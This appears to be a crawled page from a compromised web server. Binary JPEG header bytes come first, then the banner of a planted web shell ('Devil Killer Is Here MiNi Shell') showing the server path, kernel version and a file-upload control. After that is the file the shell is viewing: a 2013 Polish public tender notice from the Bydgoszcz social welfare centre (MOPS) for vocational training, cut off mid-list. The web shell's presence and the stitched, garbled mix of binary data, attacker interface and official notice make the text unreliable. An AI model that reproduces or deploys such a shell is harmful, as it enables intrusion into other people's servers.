JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131002/400224-N-2013.html

<p class="kh_header"><b>Bydgoszcz: Realizacja szkoleń zawodowych dla uczestników projektu systemowego Krok do przodu realizowanego przez MOPS w Bydgoszczy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 400224 - 2013; data zamieszczenia: 02.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Bydgoszczy , ul. Ogrodowa 9, 85-043 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 325-44-10, faks 52 3215535.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopsbydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja szkoleń zawodowych dla uczestników projektu systemowego Krok do przodu realizowanego przez MOPS w Bydgoszczy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja szkoleń zawodowych dla uczestników projektu systemowego Krok do przodu realizowanego przez MOPS w Bydgoszczy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Szczegółowy opis przedmiotu zamówienia stanowią załączniki od nr 2 do nr 17..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana będzie przez Zamawiającego wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów określonych w SIWZ dot. części nr 14-spawanie metodą MAG.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana będzie przez Zamawiającego wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów określonych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana będzie przez Zamawiającego wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów określonych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana będzie przez Zamawiającego wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów określonych w SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji  niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia
(dotyczy to: wiedzy i doświadczenia; osobach zdolnych do wykonania zamówienia  innych podmiotów,potencjału technicznego zgodnie z art. 26 ust. 2b ustawy Pzp).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy (dot. każdej części) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy tylko w przypadku, gdy zmiany będą wynikały z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy, tj:
a) zmiana lub przedłużenie terminu realizacji szkolenia
Warunki zmian:	
- inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
- uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy
- forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsbydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Ogrodowa 9
85-043 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Ogrodowa 9
85-043 Bydgoszcz
II piętro
p.46.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 26.11.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Krok do przodu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> barman-kelner.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
-blok zajęć teoretyczno-praktycznych - 120 h dydaktycznych na 1 osobę 
( w tym 20h teorii, 100h praktyki), 
-1 godzina dydaktyczna - 45 minut, 8h dydaktycznych dziennie,
-termin realizacji: od III dekady października do 6 grudnia 2013 r.
-zajęcia 5 razy w tygodniu (bez weekendów),
-szkolenie BHP,
-podstawy działania lokalu gastronomicznego i baru,
-podstawy sztuki kelnerskiej,
-wyposażenie sali konsumpcyjnej,
-przygotowanie stołu dla konsumenta,
-typologia potraw,
-obsługa klienta przy stole,
-podstawy sztuki barmańskiej,
-szkło barowe i jego zastosowanie,
-obsługa sprzętu używanego przez barmanów,
-typologia napojów bezalkoholowych i alkoholowych,
-przygotowanie i serwowanie napojów bezalkoholowych i alkoholowych,
-rozwój umiejętności interpersonalnych,
-techniki sprzedaży w lokalu gastronomicznym i barze,
-obsługa kas fiskalnych,
-ćwiczenia kompletnej obsługi klienta przy barze i w lokalu gastronomicznym,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Brukarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje :
1)blok zajęć teoretyczno-praktycznych - minimum 120 h dydaktycznych na 1 osobę  ( w tym 20h teorii, 100h praktyki), 
2)termin realizacji: od III dekady października do 6 grudnia 2013 r.
3)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
4)zajęcia 5 razy w tygodniu (bez weekendów),
5)szkolenie BHP,
6)odczytywanie projektów brukarskich,
7)szkicowanie projektów brukarskich,
8)obsługa niwelatora i poziomicy,
9)zastosowanie i obsługa narzędzi brukarskich ręcznych,
10)zastosowanie i obsługa maszyn brukarskich,
11)systematyka materiałów stosowanych w brukarstwie,
12)organizacja pracy i rozliczanie prac brukarskich,
13)przygotowanie podłoża do prac brukarskich,
14)ustawianie obrzeży, krawężników, oporników,
15)układanie kostki betonowej i granitowej w różne wzory..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> catering - kompleksowe przygotowywanie imprez okolicznościowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1) blok zajęć teoretyczno-praktycznych - 120 h dydaktycznych 
( w tym 20h teorii, 100h praktyki), 
2) termin realizacji: od III dekady października do 6 grudnia 2013 r.
3) 1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
4) zajęcia 5 razy w tygodniu (bez weekendów),
5) szkolenie BHP,
6) struktury organizacyjne imprez,
7) rodzaje i gatunki szkła,
8) techniki składania serwetek,
9) obsługa baru,
10) sporządzanie potraw i ich dekorowanie,
11) techniki nakrywania stołów
12) przyjęcia cocktail-party i inne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Florystyka (bukieciarstwo) z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 80 godzin dydaktycznych na 1 osobę, 
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3) zajęcia 5 razy w tygodniu (bez weekendów),
4)pielęgnacja kwiatów, narzędzia i środki techniczne,
5)kompozycje z roślin suchych, sztucznych i żywych,
6)dekoracje i kompozycje z kwiatów ciętych,
7)kompozycje w naczyniach,
8)układanie bukietów i wiązanek okolicznościowych (ślubne, komunijne,  
   żałobne itp.),
9)dekoracje i stroiki świąteczne i okolicznościowe,
10)techniki barw, klejenia, drutowania, wiązania,
11)techniki sprzedaży,
12)obsługa kas fiskalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> fryzjerstwo damskie i męskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1) blok zajęć teoretyczno-praktycznych - 150 h dydaktycznych na 1 osobę 
( w tym 40h teorii, 110h praktyki), 
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3) zajęcia 5 razy w tygodniu (bez weekendów),
4)szkolenie BHP,
5)specyfika działania salonu fryzjerskiego,
6)narzędzia i osprzęt fryzjerski,
7)techniki mycia głowy,
8)podstawy stylizacji, stylizacja okazjonalna, najnowsze trendy stylizacji,
9)techniki strzyżeń,
10)koloryzacje, błędy w koloryzacji i sposoby ich korekty,
11)ondulacja i jej sposoby,
12)rozwój umiejętności interpersonalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kierowca wózka widłowego z napędem silnikowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 92 h dydaktyczne na 1 osobę 
( w tym 40h praktycznej nauki jazdy wózkiem), 
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3)zajęcia 5 razy w tygodniu (bez weekendów),
4)1 grupa szkoleniowa: 10-12 osób,
5)wiadomości z zakresu BHP,
6)typy stosowanych wózków jezdniowych,
7)budowa wózka,
8)czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózka,
9)czynności kierowcy w czasie pracy z wózkami,
10)wiadomości z zakresu ładunkoznawstwa,
11) wiadomości o dozorze technicznym,
12) wiadomości związane z wymianą butli gazowych,
13) wymiana butli gazowych - pokaz instruktora i samodzielna wymiana przez uczestnika,
14) praktyczna nauka jazdy wózkiem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> konserwator terenów zielonych + pracownik gospodarczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych -150 h dydaktycznych na 1 osobę
( w tym 40h teorii, 110h praktyki), 
2) 1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3) zajęcia 5 razy w tygodniu (bez weekendów),
4)szkolenie BHP,
5)prace porządkowo-konserwacyjne,
6)urządzenia wodno-kanalizacyjne,
7)czynności naprawcze,
8) prace ogrodnicze..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> kosmetyczka z elementami wizażu, przedłużania i zdobienia paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 120 h dydaktycznych na 1 osobę 
( w tym 20h teorii, 100h praktyki), 
2) 1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3) zajęcia 5 razy w tygodniu (bez weekendów),
4)szkolenie BHP,
5)anatomia dłoni i stóp,
6)dermatologia schorzeń,
7)manicure tradycyjny, biologiczny, pedicure kosmetyczny, hybrydowy,
8)budowa paznokcia,
9)masaż dłoni i stóp,
10)zabiegi pielęgnacyjne,
11)zdobienie paznokci, metody przedłużania paznokci,
12)depilacja ciała,
13)techniki makijażu,
14)elementy kosmetyki ciała,
15)podstawy wizażu, kreacja wizerunku w pracy zawodowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> kucharz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 160 h (w tym 30h teorii, 130 h praktyki),
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3)zajęcia 5 razy w tygodniu (bez weekendów),
4)szkolenie BHP,
5)wymogi systemu HACCP,
6)zasady żywienia, 
7)wyposażenie techniczne zakładów gastronomicznych,
8)technologia gastronomiczna z towaroznawstwem,
9)podstawy sztuki kucharskiej,
10)systematyka składników mięsnych i jarskich,
11)typologia potraw,
12)metodologia przyrządzania potraw jarskich,
13)przepisy kulinarne kuchni staropolskiej i międzynarodowej,
14)sposoby serwowania dań,
15)zajęcia praktyczne z wykorzystaniem poznanych metod i przepisów,
16)obsługa kasy fiskalnej,
17)rozwój umiejętności interpersonalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
